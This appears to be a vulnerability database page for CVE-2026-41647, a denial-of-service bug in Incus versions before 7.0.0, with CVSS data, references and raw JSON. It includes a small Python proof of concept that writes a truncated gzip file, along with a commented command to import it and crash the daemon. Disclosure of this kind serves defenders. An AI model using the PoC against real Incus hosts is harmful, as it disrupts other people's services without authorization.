Security Vulnerability Report
中文
CVE-2026-41647 CVSS 6.5 MEDIUM

CVE-2026-41647

Published: 2026-05-07 14:16:03
Last Modified: 2026-05-07 19:52:14
Source: [email protected]

Description

Incus is a system container and virtual machine manager. Prior to version 7.0.0, a missing error handling could lead an authenticated Incus user to cause a daemon crash through the import of a truncated storage bucket backup file. This issue has been patched in version 7.0.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:* - VULNERABLE
Incus < 7.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-41647 # This script demonstrates how a truncated storage bucket backup # might trigger the crash in vulnerable Incus versions (< 7.0.0). import os # Create a dummy truncated file acting as a backup malicious_file = "truncated_bucket_backup.tar.gz" with open(malicious_file, 'wb') as f: # Write a partial header to simulate a truncated/corrupt backup f.write(b'\x1f\x8b\x08\x00') # Gzip magic number # The file is intentionally incomplete/truncated print(f"[+] Created truncated backup file: {malicious_file}") # The attacker would then use the Incus API or CLI to import this file. # Example command (conceptual): # incus storage bucket import <pool> <bucket> <malicious_file> print("[+] To exploit: Use the Incus CLI/API to import this truncated backup.") print("[+] Expected Result: Incus daemon crashes due to unhandled error.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41647", "sourceIdentifier": "[email protected]", "published": "2026-05-07T14:16:03.020", "lastModified": "2026-05-07T19:52:13.737", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Prior to version 7.0.0, a missing error handling could lead an authenticated Incus user to cause a daemon crash through the import of a truncated storage bucket backup file. This issue has been patched in version 7.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.0", "matchCriteriaId": "CF8EBB4B-C1F0-44C5-B063-9CF8EB6E0972"}]}]}], "references": [{"url": "https://github.com/lxc/incus/releases/tag/v7.0.0", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/lxc/incus/security/advisories/GHSA-fwj8-62r8-8p8m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.